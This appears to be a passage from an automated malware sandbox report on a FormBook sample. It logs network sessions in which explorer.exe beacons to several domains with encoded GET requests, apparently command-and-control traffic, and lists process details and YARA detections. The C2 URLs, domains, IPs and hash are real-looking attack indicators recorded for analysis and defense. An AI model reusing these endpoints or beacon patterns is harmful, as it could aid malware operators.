                                                                  5192.168.2.44976681.88.52.8880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:19.008239031 CEST6142OUTGET /i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.toypoodlebreedershome.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:19.092015982 CEST6143INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 12 May 2021 13:48:19 GMT
                                                                  Server: Apache
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Accept-Ranges: bytes
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html
                                                                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 33 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 23 66 66 66 3b 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 23 66 66 66 3b 20 2d 6d 6f 7a 2d 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 23 66 66 66 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 39 30 30 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 7d 0a 09 09 09 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 63 6f 6e 74 73 20 7b 20 6d 69 6e 2d 77 69 64 74 68 3a 36 34 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 33 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 32 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 2f 2a 77 69 64 74 68 3a 20 39 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 2a 2f 20 62 6f 72 64 65 72 3a 20 31 70 78 20 64 6f 74 74 65 64 20 23 39 39 39 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 65 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 09 09 09 0d 0a 38 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                  Data Ascii: 113df<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <style type="text/css"> body { font-family: Arial,Helvetica Neue,Helvetica,sans-serif; text-align:center; text-shadow:0 1px #fff; -webkit-text-shadow:0 1px #fff; -moz-text-shadow:0 1px #fff; } h1 { font-size: 22px; color: #900; font-weight: bold; } h2 { font-size: 16px; color: #000000; font-weight: bold; }h3 { font-size: 16px; color: #000000; font-weight: normal; } #conts { min-width:640px; margin: 30px; background-color: #fff; padding: 40px 20px; font-size: 14px; /*width: 90%; height: 100%;*/ border: 1px dotted #999; background:#eee; } </style> <title>8d404 Not Found </title> </head> <body> <div id="conts">
                                                                  May 12, 2021 15:48:19.092034101 CEST6143INData Raw: 20 20 3c 64 69 76 3e 0a 09 09 09 09 3c 68 31 3e 0d 0a 31 62 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                                  Data Ascii: <div><h1>1b404 Not Found
                                                                  May 12, 2021 15:48:19.092042923 CEST6144INData Raw: 3c 2f 68 31 3e 0a 09 09 09 09 3c 68 32 3e 0d 0a 33 39 0d 0a 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 20 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67 65 3a 3c 2f 68 32 3e 0a 09 09 09 09 3c 68 33 3e 0d 0a 31 64 0d
                                                                  Data Ascii: </h1><h2>39The server can not find the requested page:</h2><h3>1dwww.toypoodlebreedershome.com6c/i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&amp;9rJ=N8YdlZih (port 5780)</h3>
                                                                  May 12, 2021 15:48:19.092062950 CEST6144INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.449768185.53.177.5380C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:24.287259102 CEST6154OUTGET /i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.ricdevan.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:24.329476118 CEST6155INHTTP/1.1 403 Forbidden
                                                                  Server: nginx
                                                                  Date: Wed, 12 May 2021 13:48:24 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.44977023.227.38.7480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:29.463149071 CEST6187OUTGET /i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.ximibabes.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:29.644690037 CEST6189INHTTP/1.1 403 Forbidden
                                                                  Date: Wed, 12 May 2021 13:48:29 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  X-Sorting-Hat-PodId: -1
                                                                  X-Dc: gcp-us-central1
                                                                  X-Request-ID: 975553ed-19fe-4a52-aebe-ef54f52968ad
                                                                  X-Download-Options: noopen
                                                                  X-Content-Type-Options: nosniff
                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                  X-XSS-Protection: 1; mode=block
                                                                  CF-Cache-Status: DYNAMIC
                                                                  cf-request-id: 0a026f1db800002c3ef937b000000001
                                                                  Server: cloudflare
                                                                  CF-RAY: 64e41adc5b862c3e-FRA
                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Data Raw: 35 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d
                                                                  Data Ascii: 5c6<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-
                                                                  May 12, 2021 15:48:29.644754887 CEST6190INData Raw: 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e
                                                                  Data Ascii: container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-
                                                                  May 12, 2021 15:48:29.644808054 CEST6191INData Raw: 65 35 37 0d 0a 20 22 50 c5 99 c3 ad 73 74 75 70 20 62 79 6c 20 6f 64 65 70 c5 99 65 6e 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 65 6d c3 a1 74 65 20 6f 70 72 c3 a1 76 6e c4 9b 6e c3 ad 20 6b 20 70 c5 99 c3 ad
                                                                  Data Ascii: e57 "Pstup byl odepen", "content-title": "Nemte oprvnn k pstupu k tomuto webu" }, "nb": { "title": "Tilgang nektet", "content-title": "Du har ikke tillatelse til pne dette nettstedet" }, "th": {
                                                                  May 12, 2021 15:48:29.644862890 CEST6192INData Raw: 69 67 75 6e 67 20 66 c3 bc 72 20 64 65 6e 20 5a 75 67 72 69 66 66 20 61 75 66 20 64 69 65 73 65 20 57 65 62 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 69 74 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 73 6f 20 6e 65 67
                                                                  Data Ascii: igung fr den Zugriff auf diese Website" }, "it": { "title": "Accesso negato", "content-title": "Non hai lautorizzazione per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu", "content-title": "Nie m
                                                                  May 12, 2021 15:48:29.644918919 CEST6193INData Raw: 69 6d 20 72 65 64 64 65 64 69 6c 64 69 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 42 75 20 77 65 62 20 73 69 74 65 73 69 6e 65 20 65 72 69 c5 9f 69 6d 20 69 7a 6e 69 6e 69 7a 20 79 6f 6b 2e 22 0a 20 20 7d 2c 0a 20
                                                                  Data Ascii: im reddedildi", "content-title": "Bu web sitesine eriim izniniz yok." }, "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "content-title":
                                                                  May 12, 2021 15:48:29.644958019 CEST6194INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  8192.168.2.449771192.64.147.16480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:35.011543036 CEST6195OUTGET /i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.sabaidiving.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:35.250890970 CEST6196INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 12 May 2021 13:48:35 GMT
                                                                  Server: Apache/2.2.3 (CentOS)
                                                                  X-Powered-By: PHP/5.3.8
                                                                  Set-Cookie: session=4d36d09bac3145dfbd0fe2ea9e6a7871; expires=Wed, 12-May-2021 14:18:35 GMT; path=/
                                                                  Vary: Accept-Encoding,User-Agent
                                                                  P3P: CP="CAO PSA OUR"
                                                                  Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 31 Dec 2001 7:32:00 GMT
                                                                  Content-Length: 846
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 68 74 6d 6c 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 52 45 43 2d 68 74 6d 6c 34 30 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 73 61 62 61 69 64 69 76 69 6e 67 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 76 61 6c 75 65 3d 22 22 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 09 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 38 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 20 20 20 20 24 28 27 23 6d 61 69 6e 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 22 2f 63 66 2e 70 68 70 22 29 3b 0a 09 09 20 20 20 20 24 28 27 23 6d 61 69 6e 27 29 2e 63 73 73 28 27 76 69 73 69 62 69 6c 69 74 79 27 2c 20 27 76 69 73 69 62 6c 65 27 29 3b 0a 09 09 7d 29 3b 0a 0a 09 09 2f 2a 20 69 66 20 28 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 2e 6c 65 6e 67 74 68 20 3e 20 30 29 0a 09 09 20 20 20 20 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 29 3b 20 2a 2f 0a 09 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 6e 6f 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 69 64 3d 22 66 72 61 6d 65 73 65 74 22 3e 0a 09 3c 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 2f 63 66 2e 70 68 70 22 3e 3c 2f 66 72 61 6d 65 3e 0a 09 3c 66 72 61 6d 65 20 69 64 3d 22 73 75 62 31 22 20 73 72 63 3d 22 62 68 2e 70 68 70 3f 64 6d 3d 73 61 62 61 69 64 69 76 69 6e 67 2e 63 6f 6d 26 6b 77 3d 26 74 74 3d 34 64 33 36 64 30 39 62 61 63 33 31 34 35 64 66 62 64 30 66 65 32 65 61 39 65 36 61 37 38 37 31 26 74 79 3d 66 61 6c 73 65 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 22 3e 3c 2f 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c
                                                                  Data Ascii: <html xmlns="http://www.w3.org/TR/REC-html40"> <head><title>sabaidiving.com</title><meta name="keywords" value=""/><meta name="description" content=""> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> <script type="text/javascript">$(document).ready(function () { $('#main').attr('src', "/cf.php"); $('#main').css('visibility', 'visible');});/* if (parent.frames.length > 0) top.location.replace(document.location); */ </script> </head> <frameset rows="100%,*" frameborder="no" border="0" framespacing="0" id="frameset"><frame id="main" src="/cf.php"></frame><frame id="sub1" src="bh.php?dm=sabaidiving.com&kw=&tt=4d36d09bac3145dfbd0fe2ea9e6a7871&ty=false" style="visibility: hidden;"></frame> </frameset></html
                                                                  May 12, 2021 15:48:35.250931025 CEST6196INData Raw: 3e
                                                                  Data Ascii: >


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  9192.168.2.449772192.0.78.2480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:40.409845114 CEST6198OUTGET /i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.onemoresysadmin.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:40.450537920 CEST6198INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Wed, 12 May 2021 13:48:40 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.onemoresysadmin.com/i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih
                                                                  X-ac: 2.hhn _dca
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:15:46:42
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
                                                                  Imagebase:0xfb0000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:15:46:46
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Imagebase:0x30000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Start time:15:46:46
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Imagebase:0x230000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Start time:15:46:47
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Imagebase:0x8e0000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, Author: Joe Security
